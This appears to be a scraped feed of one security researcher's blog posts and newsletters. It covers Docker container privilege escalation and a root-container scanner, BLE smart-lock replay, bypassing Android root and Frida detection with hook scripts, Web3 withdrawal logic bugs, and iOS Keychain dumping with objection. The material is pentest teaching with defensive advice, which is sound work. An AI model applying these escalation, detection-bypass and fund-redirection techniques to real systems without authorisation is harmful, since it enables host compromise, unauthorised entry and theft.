
![](/content/images/2025/09/image-4.png)

Privilege Escalation

A quick `whoami` confirms the escalation: we now have a root shell on the host.

## Theory behind all of this

The key to this attack is understanding how Docker mounts work and how the Linux kernel treats privileges. When you run a container as root, the process inside the container still has the full authority of the root user as far as the kernel is concerned. The container runtime may try to isolate the filesystem, network or processes, but once a host directory is mounted inside the container, that barrier becomes porous.

From the container’s perspective, the mounted directory is just another folder it can write to. When root inside the container changes ownership or sets special permissions on a file in that directory, those changes are applied directly to the underlying files on the host. There is no translation layer, it is the same inode seen from two different views.

This is where the SUID bit comes into play. In Linux, if a binary has the SUID bit set and is owned by root, any user who executes it will run the program with root privileges. So when root inside the container drops such a binary into the shared folder, the host inherits those changes instantly. An unprivileged user on the host, who normally would have no way to elevate, suddenly has access to a binary that the kernel will execute as root on their behalf.

What looks like a harmless convenience, mounting a directory to copy files back and forth becomes a direct privilege escalation path. The kernel does not distinguish between “root in a container” and “root on the host” when it comes to filesystem ownership and permissions, and the SUID mechanism ensures that the consequences of that mistake are immediate and complete.

# Privilege Escalation - Second Pattern

This second scenario is more subtle. Instead of abusing a mounted host directory, we combine two different access points:

1.  Root inside the container.
2.  A non-privileged user on the host with the same UID as a process running inside the container.

When those conditions align, we can use `/proc/&lt;PID&gt;/root` on the host to interact with files created by root in the container including dangerous device files.

## Setting up inside the container

We start a container as root and create a device file pointing to the host’s disk:

![](/content/images/2025/09/image-5.png)

Running the container

Now `/sda` exists inside the container and points directly to `/dev/sda` on the host. The wide-open permissions mean anyone can access it.

## Creating a matching user

Next, we create a user inside the container that mirrors a real host user. In this case, the host has a user `rsgbengi` with UID 1000. So inside the container:

```bash
userdel ubuntu           # remove default user
useradd -m -U 1000 -s /bin/bash rsgbengi

```

![](/content/images/2025/09/image-6.png)

Removing the ubuntu user

![](/content/images/2025/09/image-7.png)

Adding the rsgbengi user

Now the container has a user with UID 1000, exactly the same as the unprivileged host account.

## Launching a shell as that user inside the container

Switch to `rsgbengi` inside the container and run a shell:

```bash
su rsgbengi
/bin/sh

```

![](/content/images/2025/09/image-8.png)

Just one shell in the user&apos;s shell

![](/content/images/2025/09/image-12.png)

Running a shell on the docker container

At this point, there is a `/bin/sh` process inside the container running with UID 1000. From the host’s perspective, that process also belongs to UID 1000 the unprivileged `rsgbengi` account.

## Finding the process from the host

On the host, as the non-privileged user, we can find that shell’s PID:

Suppose the PID is `88610`.

```bash
ps auxf | grep /bin/sh

```

![](/content/images/2025/09/image-9.png)

Shell created on the container detected

## Accessing the container’s filesystem via `/proc`

Linux exposes each process’s root filesystem under `/proc/&lt;PID&gt;/root`. From the host:

```bash
ls -l /proc/88610/root

```

Here we can see the container’s root filesystem including the device file `sda` created earlier by root in the container:

![](/content/images/2025/09/image-11.png)

sda file

Because the file is world-readable/writable (`777`), the host user `rsgbengi` can now interact with it.

## Why this works

The core of this attack lies in how Linux handles device files and process namespaces. When root inside the container uses `mknod` to create a new device file pointing to `/dev/sda`, the kernel doesn’t see it as a fake placeholder. It is a real interface to the host’s physical disk, because device files are simply special inodes that reference kernel drivers. By leaving the file with world-writable permissions, root inside the container effectively built a backdoor into the host disk and made it accessible to anyone who can reach it.

On its own, that device file would still be trapped inside the container’s filesystem. The trick comes from aligning user IDs between host and container. When we create a user inside the container with the same UID as a real user on the host, any process running in the container under that UID is also recognized by the kernel as belonging to the same host account. From the kernel’s perspective, there is no distinction UID 1000 is UID 1000 regardless of whether the process was launched from the container or the host.

Linux exposes each process’s view of the filesystem through `/proc/&lt;PID&gt;/root`. If a user owns the process, they are allowed to traverse that view. This means the host user with UID 1000 can navigate into the container’s filesystem for any process also running as UID 1000, and interact with files there as if they were local. In this case, the file `/sda` created by root in the container is visible under `/proc/&lt;PID&gt;/root/sda`. Because it was left with open permissions, the host user can now read it directly.

The end result is that an unprivileged account on the host, which normally has no business touching raw disk blocks, suddenly has that power handed to it by the container’s root. From here the user can extract sensitive information straight from disk or, with more careful manipulation, move toward full host compromise. What made this possible is not a single bug but the combination of three design choices: root authority inside the container, the global nature of UIDs across host and container, and the way Linux exposes process root filesystems through `/proc`.

# DEV Update - Detecting Root Containers with Valeris

It’s been a while since I last shared an update on [Valeris](https://github.com/rsgbengi/valeris). A lot has changed under the hood:

-   The tool has now moved from Rust-based detectors to **YAML templates**, so you can create new checks without recompiling.
-   I added a simple **update flag**, making it easier to keep Valeris up to date.
-   And several new templates have landed, including one that directly relates to the privilege escalation attacks we explored earlier.

One of the first misconfigurations Valeris can already spot is when a container is running as root. It’s still an early feature, but it works, and it’s implemented in a way that makes it easy to extend later.

Valeris uses **YAML templates** to define each check. These templates describe:

-   What to look for in the Docker runtime configuration.
-   How to match it (using JSONPath).
-   How to report it back to the user.
-   Suggested fixes to remediate the issue.

```yaml
id: root_user
name: &quot;Root User (YAML)&quot;
target: docker_runtime
severity: HIGH
description: Detect containers running as root.
match:
  jsonpath: &quot;$.Config.User&quot;
  equals: &quot;&quot;
message: &quot;Container is running as root&quot;
fix: |
  Specify a non-root user with the --user flag.
```

Here’s what’s happening:

-   The rule inspects `$.Config.User` from the Docker API.
-   If the field is empty, it means no user was set → the container defaults to root.
-   Valeris then raises a **High severity finding**, with a clear message and a suggested fix (`--user` flag).

When you run the scanner against a test container, the output is straightforward:

![](/content/images/2025/09/image-13.png)

Running Valeris to detect root\_user

Right now Valeris is still in a very early stage. It only supports a handful of detectors, but the foundation is solid. Because checks are defined in YAML and powered by the Docker runtime API, adding new ones is as simple as writing another small rule.

Today it’s root users. Tomorrow it could be dangerous mounts, excessive capabilities, or exposed ports all defined as YAML templates that anyone can add.

You can see all the current detectors with the `list-plugins` argument or by browsing the [GitHub repo](https://github.com/rsgbengi/valeris). All of them live in the `rules` folder.

![](/content/images/2025/09/image-14.png)

Plugins available right now

Probably my next step will be to develop a way to run the same scans not only against running containers but also against the Dockerfile itself, so developers can catch misconfigurations earlier in the pipeline. Let me know what you think!

# Conclusions

At the end of the day, containers running as root are not just a small misstep, they’re the foundation for many of the attacks we walked through. A simple mount here, a UID overlap there, and suddenly your “isolated” container is a shortcut to the host.

The good news is that these issues are easy to prevent once you know what to look for. Define a non-root user, avoid privileged flags, be careful with what you mount, and you’ve already closed the door on some of the simplest escalation paths.

Valeris won’t catch the full exploit chain, but it does highlight the risky defaults that make those chains possible. That alone can save you from turning a late-night `docker run` into a full compromise story.

# References

-   Docker breackout / Privilege Escalation. [https://blog.1nf1n1ty.team/hacktricks/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation](https://blog.1nf1n1ty.team/hacktricks/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation)
-   Docker engine security. [https://docs.docker.com/engine/security/](https://docs.docker.com/engine/security/)
-   OWASP Docker Security Cheat Sheet. [https://cheatsheetseries.owasp.org/cheatsheets/Docker\_Security\_Cheat\_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)</content:encoded><author>Ruben Santos</author></item><item><title>Breaking Mobile-to-Device Logic: When BLE Access Falls Apart</title><link>https://www.kayssel.com/newsletter/issue-13</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-13</guid><description>Mobile apps that unlock doors might seem secure — until you replay a BLE packet, go offline, or bypass the logic entirely.</description><pubDate>Sun, 13 Jul 2025 10:54:33 GMT</pubDate><content:encoded>Hey everyone 👋

Lately, I’ve been digging into mobile apps that interact with physical devices, like smart locks, BLE door readers, or NFC-based access systems.

These apps are fascinating because they blend software with hardware, and that means real-world consequences if something breaks. Like... people walking into buildings they shouldn&apos;t.

So in this issue, I want to share some attack paths, interesting tests, and observations that can help you break (or secure) apps that interact with the physical world.

Let’s get into it.

## Sniff BLE Traffic Even Without Special Hardware

If you don’t have a dedicated BLE sniffer, Android gives you a nice trick:

Go to `Developer Options` → **Enable Bluetooth HCI snoop log**  
This saves a log file at `/sdcard/btsnoop_hci.log` — pull it out and open it in Wireshark.

Once inside:

-   Look for UUIDs and write characteristics used to send commands
-   Try to identify a &quot;door unlock&quot; packet
-   Repeat the same operation multiple times — does the payload change?
-   If it doesn’t, you might be able to **replay it using Python** with something like [`bleak`](https://github.com/hbldh/bleak)

✅ **Test This:** Capture and replay a BLE command to unlock the door  
If it’s static and not signed, that’s a huge problem.

## Reversing Custom BLE Protocols

A lot of vendors try to hide behind **“**proprietary protocols**”**, assuming nobody will figure them out. Spoiler alert: we will.

If you’ve got the APK:

-   Drop it into **Jadx**, and search for characteristic UUIDs or BLE calls like `writeCharacteristic()`
-   Look for payload formatting code — you might find it’s just base64-encoded JSON or a simple byte array with no real protection
-   If the app builds a packet without any signature or cryptographic verification, that’s game over

**Inspect:** Is the reader validating anything? Or just accepting commands blindly?

## What Happens When You’re Offline?

This is one of the most overlooked attack surfaces in physical access apps.

Let’s say the backend issued you a credential 3 days ago. What happens if your phone has been offline since then?

-   Can you still open the door?
-   Is there a local expiration? Usage counter?
-   Can you modify local storage to reset state?

If the mobile app relies purely on remote revocation and doesn’t enforce local restrictions, you might still get in long after your access should’ve been revoked.

## How Are Credentials Stored?

Even if credentials are issued securely, how they’re **stored** matters a lot.

Things to look at:

-   Are they in the **Keystore** (Android) or **Keychain** (iOS)?
-   Do they use secure access flags like `kSecAttrAccessibleWhenUnlockedThisDeviceOnly`?
-   Are encrypted SharedPreferences really encrypted, or just obfuscated?

## Anti-Frida Defenses (And Why They Usually Suck)

Apps like these often try to block tools like **Frida** or detect rooted devices.

If you read **last week’s issue**, you’ll remember we dove deep into how to **bypass detection**, dump classes, and trace hooks even on hardened apps  
📌 [_If you missed it, check it out here_](https://www.kayssel.com/newsletter/issue-12/)

But here&apos;s a quick refresher:

-   Use **Magisk DenyList** to hide root
-   Attach **Frida after launch** instead of before (`frida -U -n com.app`)
-   Try **Frida Codeshare** scripts like:
    -   `anti-frida-detection.js`
    -   `hide_frida_gum.js`
    -   `anti-root-bypass.js`
-   If you crash immediately, dump loaded classes and log suspicious method calls
-   Trace native logic with `frida-trace` or analyze `.so` files with `Ghidra` or `r2frida`

These tricks often give you visibility into how the app generates BLE packets or validates stored credentials.

## Other Cool Things to Try

A few more test ideas that don’t always get enough love

#### 📡 Timestamp manipulation

If tokens expire locally, try changing the device clock  
Does it allow extending the token’s lifetime?

#### 🌍 Geo-fencing bypass

If the app checks location before allowing access, try using mock location to simulate valid zones.

#### ⏱️ Multi-device race conditions

What happens if two devices try to use the same credential simultaneously?  
Does the system de-sync, crash, or unlock both?

## Wrapping Up

Apps that interact with physical devices are high-impact targets they sit at the intersection of mobile security, hardware protocols, and real-world consequences

The good news?  
You can test a lot with just a rooted phone, Wireshark, and a bit of scripting

To recap

✅ Sniff BLE traffic with Android’s HCI snoop log  
✅ Reverse how commands are built and look for replay attacks  
✅ Explore offline behavior and revocation handling  
✅ Inspect how credentials are stored  
✅ Bypass anti-Frida and trace BLE logic  
✅ Get creative — timestamps, location spoofing, race conditions... they all matter

Hope this gives you a strong base to start testing apps that control hardware around you

Thanks for reading, and see you next time  
Stay sneaky out there 🕶️

Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Reversing Android Apps: Bypassing Detection Like a Pro</title><link>https://www.kayssel.com/newsletter/issue-12</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-12</guid><description>Techniques to bypass root, Frida, and SSL protections in modern Android apps</description><pubDate>Sun, 06 Jul 2025 10:08:32 GMT</pubDate><content:encoded>Hey everyone

Over the past couple of weeks, I’ve been working on some Android app assessments that turned out to be much more annoying than expected. Not because the logic was complex, but because the apps just refused to cooperate.

Frida was detected. The app crashed instantly. Root checks blocked everything. And SSL pinning made traffic analysis painful.

But here’s the thing: if an APK runs on your device, you can break it. Sometimes it just takes a little persistence, a lot of script tweaking, and a few clever tricks.

In this issue, we’re going to explore how to reverse engineer APKs, beat common detection techniques, and get your hooks in even when the app is fighting back hard.

Let’s get into it

## First Things First: Try Magisk DenyList

If you&apos;re testing on a rooted device, the quickest trick to try is Magisk’s DenyList.

DenyList allows you to select apps that should be &quot;shielded&quot; from root visibility. When enabled, Magisk hides things like `su`, root binaries, and known Magisk paths, making your device appear clean.

It works because most apps just scan for common root indicators. If those are missing, the app often stops caring.

To enable:

1.  Turn on Zygisk in Magisk settings
2.  Enable DenyList
3.  Add your target app
4.  Reboot and test

Sometimes, that’s all it takes.

## Frida Codeshare Scripts: Quick and Dirty Bypasses

Next, head to Frida Codeshare and try out some common scripts:

-   `anti-root-bypass.js`
-   `anti-frida-detection.js`
-   `hide_frida_gum.js`

These scripts patch common detection logic dynamically, overriding checks like `getRunningAppProcesses`, `isDebuggerConnected()` or native `ptrace()` calls.

```bash
frida -U -f com.example.app -l anti-frida-detection.js

```

I’ve had mixed results. On lightly protected apps, they work. On well-defended ones, not so much.

Still, these scripts take 30 seconds to try, and sometimes they’re enough to get you through.

## Don’t Launch With Frida – Attach After

Some apps only perform detection at launch. If Frida is already injected, the app sees it and crashes.

But if you:

1.  Launch the app normally (via Android launcher or `adb`)
2.  Wait for it to load
3.  Then attach using:

```bash
frida -U -n com.example.app
```

You might slip past those weak checks.

This works especially well when detection logic runs in `Application.onCreate()` or early init code. If Frida isn&apos;t present at that moment, the app might assume you&apos;re legit.

## Static Reversing: Find Detection Code with Jadx

Once you’ve unpacked the APK, drop it into [Jadx](https://github.com/skylot/jadx) and start searching for juicy strings:

-   `&quot;frida&quot;`
-   `&quot;root&quot;`
-   `&quot;magisk&quot;`
-   `&quot;ptrace&quot;`
-   `&quot;su&quot;`
-   `&quot;getprop&quot;`
-   `&quot;debugger&quot;`

&lt;details&gt;
&lt;summary&gt;These often lead you to custom detection logic like:&lt;/summary&gt;

```java
public boolean isFridaDetected() {
    return getRunningServices().contains(&quot;frida&quot;);
}
```
&lt;/details&gt;


Or native JNI bridges doing sketchy stuff.

Once found, hook and patch them:

```js
Java.perform(() =&gt; {
  const Check = Java.use(&quot;com.example.security.Checks&quot;);
  Check.isFridaDetected.implementation = function () {
    return false;
  };
});
```

Detection bypassed.

## Objection Patch: When You’re in a Hurry

[Objection](https://github.com/sensepost/objection) has a handy feature that tries to remove common protections from the APK directly.

```bash
objection patchapk --source app.apk
```

It attempts to inject a Frida gadget basically.

But there’s a catch. Objection relies on `apktool`. If you&apos;re on Kali or another pentest distro, the default `apktool` is probably outdated or broken. So what you can do It&apos;s to install the latest version manually [https://apktool.org/docs/install](https://apktool.org/docs/install)**.** After this the patching should work perfectly 😄

## Dump Loaded Classes Before the Crash

If the app still crashes when Frida attaches, try this:

```java
Java.perform(() =&gt; {
  Java.enumerateLoadedClasses({
    onMatch: function (name) {
      console.log(name);
    },
    onComplete: function () {
      console.log(&quot;Done&quot;);
    }
  });
});
```

Run the script right before the crash happens. You’ll get a list of loaded classes, including the ones likely involved in detection.

Then, take it further.

## Log Which Methods Are Being Called

&lt;details&gt;
&lt;summary&gt;You can use Frida to hook and log every method from those suspicious classes:&lt;/summary&gt;

```java
Java.perform(() =&gt; {
  const target = Java.use(&quot;com.example.security.DetectionManager&quot;);
  target.checkFrida.implementation = function () {
    console.log(&quot;checkFrida() called!&quot;);
    return false;
  };
});
```
&lt;/details&gt;


Track which functions execute just before the crash. That’ll help you pinpoint where to dig deeper.

## JNI Detection: Follow the Native Trail

If Java-level detection isn’t working, the app may be using native code via JNI.

Use `frida-trace` to hook into `JNI_OnLoad` or other suspicious exports:

```bash
frida-trace -n com.example.app -i &quot;JNI_OnLoad&quot;

```

Then use tools like `nm`, `objdump`, or `strings` to peek inside native `.so` files.

Worst case, you’ll need to reverse with [Ghidra](https://ghidra-sre.org/) or [r2frida](https://github.com/nowsecure/r2frida) to understand what the native libs are doing.

This can take time, but when apps crash early or use aggressive native checks, it’s often your only real option.

## When Nothing Works: Patch for SSL Only

If all else fails, and the app is still detecting Frida, crashing on root, or obfuscating everything, and you&apos;re on a short pentest…

At least get network visibility.

[apk-mitm](https://github.com/shroudedcode/apk-mitm) patches the APK to disable SSL pinning so you can inspect HTTPS traffic in Burp or mitmproxy.

```bash
apk-mitm app.apk
```

Install the patched APK, run the app, and proxy the traffic.

This won’t let you hook with Frida, but you’ll still be able to watch tokens, endpoints, headers, and more.

Not ideal, but when the clock is ticking, it’s a life-saver.

## Wrapping Up

APK reversing is like picking a lock. Sometimes the first tool works. Sometimes you need to go layer by layer, Java, then JNI, then native assembly, until something cracks.

To recap:

-   Try Magisk DenyList for quick wins
-   Use Frida codeshare scripts to bypass common detections
-   Attach after launch to dodge init-time checks
-   Use Jadx to find detection logic and patch it
-   Patch with Objection, but make sure your apktool isn’t broken
-   Dump classes and trace methods before the crash
-   Trace JNI and reverse native code if needed
-   Patch SSL with apk-mitm if all else fails

Hope this gives you a solid framework to tackle stubborn Android apps. If you hit a wall, don’t give up. You’re probably just one hook or stub away from getting in.

Thanks for reading and see you next time  
Stay stealthy out there

— Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>When Web3 Withdrawals Meet Web2 Logic</title><link>https://www.kayssel.com/newsletter/issue-11</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-11</guid><description>How classic backend bugs like race conditions and IDORs still break Web3 withdrawal flows today</description><pubDate>Sun, 29 Jun 2025 08:45:36 GMT</pubDate><content:encoded>Hey everyone

Over the past couple of weeks, I’ve been working on a few projects involving Web3 deposit and withdrawal flows. And something kept coming up. Even when things look decentralized on the surface, the logic behind the scenes often runs through classic Web2 backends.

That mix is where things start to break.

In this issue we’re going to dig into what can go wrong when blockchain-based systems rely on traditional logic for handling money. We’ll walk through real attack scenarios like race conditions, broken authorization, weak 2FA enforcement, and some clever UI tricks that can turn secure-looking flows into easy targets.

Let’s get into it

## **Withdrawal Race Condition**

  
Here’s a classic bug that shows up more often than you’d think, especially in hybrid Web3 and Web2 setups.

Even though your withdrawals might end up on-chain, they often start with a Web2-style backend call. Something like a `POST /withdraw` that talks to your hot wallet signer.

Now imagine this. The backend checks if your balance is enough before processing the withdrawal, but doesn&apos;t lock anything or wrap it in a proper transaction. That’s when race conditions sneak in.

A race condition happens when multiple actions happen at the same time and the system can&apos;t keep up with the timing. If two or more requests check the balance at the exact same moment and both see the same number, they might both get approved before anything is updated.

Let’s make it concrete. I have 5 ETH in my account. I fire off 10 withdrawal requests for 1 ETH each, all in parallel. If the backend isn&apos;t careful, all of them see 5 ETH, all of them get approved, and suddenly I’ve withdrawn way more than I should.

You can simulate this pretty easily using [Turbo Intruder](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988) in Burp Suite or the [Parallel Repeater](http://portswigger.net/burp/documentation/desktop/tools/repeater/send-group#sending-requests-in-parallel). If you see multiple withdrawals going through from a limited balance, congrats, you’ve just uncovered a race condition.

## **IDOR/BOLA on Withdrawals**

  
This one’s surprisingly common. [BOLA (Broken Object Level Authorization),](https://www.kayssel.com/post/bola-and-bfla/) or what many still call IDOR, happens when the backend forgets to check if the user actually owns the thing they’re trying to access. In this case, a withdrawal.

Let’s say your app shows your pending withdrawals like this:

```bash
GET /withdrawals/881
Authorization: Bearer your_token
```

&lt;details&gt;
&lt;summary&gt;Now imagine I change that to:&lt;/summary&gt;

```bash
GET /withdrawals/882
```
&lt;/details&gt;


And suddenly I’m looking at someone else’s withdrawal details. That’s BOLA.

But it doesn’t stop there. What if I go a step further and modify the withdrawal?

```bash
PATCH /withdrawals/882
Authorization: Bearer attacker_token
{ &quot;status&quot;: &quot;approved&quot;, &quot;to&quot;: &quot;0xAttackerWallet&quot; }
```

If the backend doesn’t check who owns withdrawal 882, I just hijacked someone’s funds and redirected them to my wallet.

This usually happens when IDs are predictable and the backend trusts the token too much without validating ownership. To test this, grab a valid request in Burp, increment the ID, and see if you can access or modify someone else’s data.

If it works, you’ve got a serious logic bug.

## Skipping 2FA During Withdrawals

On paper, adding 2FA to withdrawals sounds like a solid move. Before sending a large amount, the user has to confirm it with a code sent by SMS, email, or an authenticator app. Makes sense, right?

But here’s the catch. Just because the frontend asks for a 2FA code doesn&apos;t mean the backend is actually enforcing it.

Imagine this. I steal your session token. Maybe through phishing, maybe through a SIM swap. When I try to withdraw, the app sends me a nice little 2FA prompt. But instead of entering anything, I skip the UI and go straight to the withdrawal endpoint using the stolen token.

If the backend doesn’t verify whether the 2FA challenge was actually completed and validated, the withdrawal goes through anyway.

Worse, in some systems, the 2FA token field might be optional, reused, or even entirely ignored. That means an attacker could replay an old token or skip the field completely and still get the funds out.

To test this, try sending a withdrawal request:

-   Without the 2FA token
-   With a reused 2FA code
-   While skipping the entire verification step

If any of those work, then your 2FA is only protecting the UI, not the actual logic. And if the backend assumes “if it came from the app, it must be legit,” you&apos;re one step away from someone draining accounts without ever touching a code.

## Double Execution via Retry

This one feels harmless at first. Some apps separate withdrawal into two steps: first you create the request, then you hit an `/execute` endpoint to actually send the funds.

That makes sense. Maybe the backend needs to wait for 2FA approval, compliance checks, or some manual confirmation. But here’s where things break.

If the backend doesn&apos;t properly mark the withdrawal as processed before executing it, an attacker can just call the `/execute` endpoint again. And again. And again.

Let’s say I request a withdrawal. I get back a `withdrawalId`. After it’s approved, the app calls:

```bash
POST /withdraw/execute/abc123
Authorization: Bearer stolen_token
```

Now I take that exact same request and send it ten times in a row. If there’s no protection in place, the backend might process it each time, triggering multiple payouts from a single request.

In some cases, the same `withdrawalId` might return a new transaction hash every time. Or even worse, all of them succeed and send funds.

To test this, try delaying the first execution slightly. Then spam the same endpoint in parallel using Turbo Intruder or Parallel Repeater. If the backend doesn’t lock or update the withdrawal status before sending the funds, you’ll see multiple transactions.

This kind of bug is sneaky. It often hides in systems where developers assume the `/execute` endpoint will only be called once by the frontend.

## **Address Poisoning via 2FA Approval Metadata**

  
This one’s more social engineering than technical exploit, but it’s just as dangerous.

Many apps show a 2FA prompt before approving a withdrawal. The user sees a message like “Approve withdrawal of 10 ETH to 0x1234...abcd” in their mobile authenticator, push notification, or security app.

That message is supposed to give the user confidence that everything looks right. But what if the attacker controls part of what the user sees?

Imagine this. I initiate a withdrawal to my own wallet address, something ugly like:

0xDeadBeefCafe0000000000000000000000000000

But I include a fake label in the request, like:

&quot;label&quot;: &quot;0xAbC123...4567 (Ledger Wallet)&quot;

If the backend doesn’t sanitize or validate that label before sending the 2FA challenge, the user might see:

Approve withdrawal  
Amount: 10 ETH  
To: 0xAbC123...4567 (Ledger Wallet)

It looks legit, but it’s completely fake. The label is attacker-controlled. The actual funds are going to a malicious address.

This trick works because users trust what they see in security prompts. If the backend allows user-supplied metadata to appear in that prompt, it becomes a perfect tool for deception.

To test this, try creating a withdrawal with custom fields like `label`, `note`, or `display_name`. If they show up in the 2FA app or prompt, you’ve found a dangerous vector for misleading users.

If the 2FA UI is showing attacker-supplied data, then it&apos;s no longer a second factor of authentication. It&apos;s a second factor of illusion.

## Wrapping Up

Deposit and withdrawal flows might seem simple, but when Web3 meets Web2, things can get messy fast.  
All the classic logic bugs from traditional apps show up here too race conditions, IDORs, weak 2FA enforcement, and misleading UI. The only difference is that now the bugs are moving money.

If you&apos;re testing one of these systems, forget the hype for a second and focus on the logic.  
Ask yourself:

-   Can I trigger the same action twice?
-   Is the backend relying too much on the frontend?
-   Are users being shown information they shouldn’t trust?

These flows are high-value targets, and small mistakes can lead to real losses.  
Hopefully, this gave you a few new ideas to try out in your next project or audit.

Thanks for reading and see you next time. Keep poking at the logic and stay safe out there.</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Cracking the iOS Keychain: What It Protects, Where It Fails</title><link>https://www.kayssel.com/newsletter/issue-10</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-10</guid><description>iOS Keychain 101: What It Is and How to Hack It</description><pubDate>Sun, 22 Jun 2025 13:14:56 GMT</pubDate><content:encoded>Hey everyone!

In my previous issue, we explored the Android Keystore what it protects, where it fails, and how to attack it. This time, we’re switching sides to look at its Apple counterpart: the iOS Keychain.

If you’re new to mobile security or pentesting, don’t worry I’ll break down what the Keychain is, why it matters, and how attackers can exploit weak implementations.

Let’s crack open Apple’s vault 👇

## 🧠 **What is the iOS Keychain?**

Imagine you’re a developer building an app that needs to store sensitive information, like:

-   a password,
-   an API token,
-   or a private key.

You _can’t_ just save that in a normal file or database it would be too easy for attackers to steal.

That’s where the iOS Keychain comes in. It’s a special system provided by iOS that allows apps to safely store small pieces of sensitive data.

### Key features:

✅ **Encrypted at rest** — The data is protected using the device’s hardware security, like the Secure Enclave (a chip that keeps secrets safe).

✅ **Lock state protection** — You can choose if the data is only available when the device is unlocked, or if it’s always available.

✅ **Access control** — Apps can limit which other apps can access their Keychain data.

⚠️ **But!** The Keychain only protects the data _while it’s stored_. Once the app uses the data (for example, loads a password into memory), other protections need to kick in and this is where mistakes happen.

## **Common Developer Mistakes**

Let’s break down the most common ways developers misuse the Keychain and how attackers can take advantage.

## **Using weak protection settings (accessibility attributes)**

When adding a secret to the Keychain, the developer chooses _when_ that secret is available:

-   **`kSecAttrAccessibleAlways`** → Always available, even if the device is locked.
-   **`kSecAttrAccessibleAfterFirstUnlock`** → Available after the device has been unlocked once after boot.

**Why is this bad?**  
If someone steals the device or dumps its storage, they could extract secrets without needing the passcode.

**Pentester view:** We can dump Keychain data in a cold boot attack or during forensic analysis.

## **Storing too much or the wrong type of data**

Some developers think:

&gt; “The Keychain encrypts stuff, so let’s save everything there!”

But Keychain is designed for small secrets (e.g. passwords, tokens). Not big files, logs, or configs.

**Why is this bad?**  
The more you store, the higher the chance something valuable slips through poor configuration.

## **Thinking the Secure Enclave protects everything**

Not all Keychain items are protected by the Secure Enclave only certain types (e.g. private keys with the right settings).

**Why is this bad?**  
Attackers on a jailbroken device can dump the Keychain DB and get at items that aren’t hardware protected.

## **Failing to bind secrets to local authentication (Touch ID / Face ID / passcode)**

Some apps use the Keychain to store secrets that protect access to the app itself for example, a token that proves the user has unlocked with Face ID or a PIN.

But sometimes, developers forget to require local authentication (biometrics or passcode) when the app retrieves the secret:

-   They don’t set `kSecAccessControlUserPresence` or similar flags.
-   The app can read the secret without asking the user to authenticate.

**Why is this bad?**  
An attacker with code execution (e.g. via Frida) can call the same function the app uses to get the secret no biometric or passcode prompt needed = bypass of local authentication.

💡 **Pentester view:** With **objection**, you can trigger this bypass easily:

```bash
ios ui biometrics_bypass
```

This command tells the app (via objection) to bypass the biometric prompt. If the app’s Keychain usage wasn’t properly bound to local authentication, it will still give up the secret without any user interaction.

&lt;details&gt;
&lt;summary&gt;Combine this with:&lt;/summary&gt;

```bash
ios keychain dump --raw
```
&lt;/details&gt;


to list and extract Keychain items the app is using and see if any are accessible without local auth.

## 🛠️ **Tools of the Trade**

If you’re just starting out, here are tools pentesters use to test Keychain implementations:  
🔹 **Frida** — A tool that lets you hook (intercept) function calls, like when an app reads from Keychain.  
🔹 **objection** — Easy-to-use tool to inspect and manipulate apps at runtime (built on Frida).

## 🧪 **Labs &amp; Practice**

If you really want to understand how the Keychain works,s and how to spot or exploit its weaknesses, there are two solid ways to practice:

### 🛠 **Option 1: Build your own test app**

One of the best ways to learn is to create a simple iOS app yourself:

-   Store secrets in the Keychain using different configurations (e.g. with or without local authentication, with various accessibility attributes).
-   Write code that tries to read these secrets under different conditions (locked device, after reboot, etc.).
-   See how changing settings like `kSecAttrAccessibleWhenUnlocked` or adding `kSecAccessControlUserPresence` affects security.

👉 _By building and testing your own app, you&apos;ll gain hands-on experience with how Keychain protections really work._

### ⚡ **Option 2: Practice hacking with DVIA-v2**

If you’d rather jump straight into hacking practice, use [DVIA-v2 (Damn Vulnerable iOS App v2)](https://github.com/prateek147/DVIA-v2):

-   It’s a purposely insecure app made for learning iOS pentesting.
-   Includes Keychain vulnerabilities and many other common iOS security issues.
-   Safe environment to test tools like objection or Frida without risking a real app.

### 📖 **Recommended reading**

👉 For a step-by-step guide to iOS pentesting basics (including Keychain issues), I highly recommend this article:  
[Practical iOS Penetration Testing – A Step-by-Step Guide](https://aupsham98.medium.com/practical-ios-penetration-testing-a-step-by-step-guide-8214d35aaf3c)

## 📝 **Final Thoughts**

✅ The iOS Keychain is powerful but only if developers use it correctly.

❌ The Keychain protects data _at rest_ but once your app loads the secret into memory, or if you skip local authentication, attackers can strike.

As offensive security professionals, our job is to:

-   Understand how these mechanisms work.
-   Spot weak points in real apps.
-   Test both storage and runtime usage of sensitive data.

So just like we said with the Android Keystore:  
_“It’s in the Keychain” doesn’t automatically mean it’s safe._

Until next time,  
Stay sharp, stay testing,  
Ruben **🚀**</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Android Keystore: Fort Knox or Glass Box?</title><link>https://www.kayssel.com/newsletter/issue-9</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-9</guid><description>Breaking and Defending Android’s Key Vault</description><pubDate>Sun, 15 Jun 2025 11:29:34 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

When it comes to mobile security, most developers trust the Keystore like it’s untouchable.  
But what is the Android Keystore really? What does it protect? What doesn’t it? And more importantly, how can we, as pentesters, test whether it’s used properly?

In this issue, we’ll break down what the Keystore is, how it works, where it fails, and how to test apps that rely on it.

Let’s crack open the vault 👇

## 🧠 What is the Android Keystore?

The Android Keystore is a secure system service that allows apps to generate, store, and use cryptographic keys without exposing them to the app or the filesystem.

These keys are:

-   **Non-exportable** – you can use them, but you can&apos;t read them.
-   **Stored securely** – ideally in the **TEE** (Trusted Execution Environment) or **StrongBox**, a hardware-backed secure element.

The Keystore is designed to allow secure usage of:

-   RSA, AES, EC keys
-   Key signing, encryption/decryption
-   Keys bound to user authentication or hardware state

But here’s the kicker: you don’t store secrets in the Keystore you store keys. If you want to protect a token or password, you encrypt it with a Keystore-managed key and store the ciphertext.

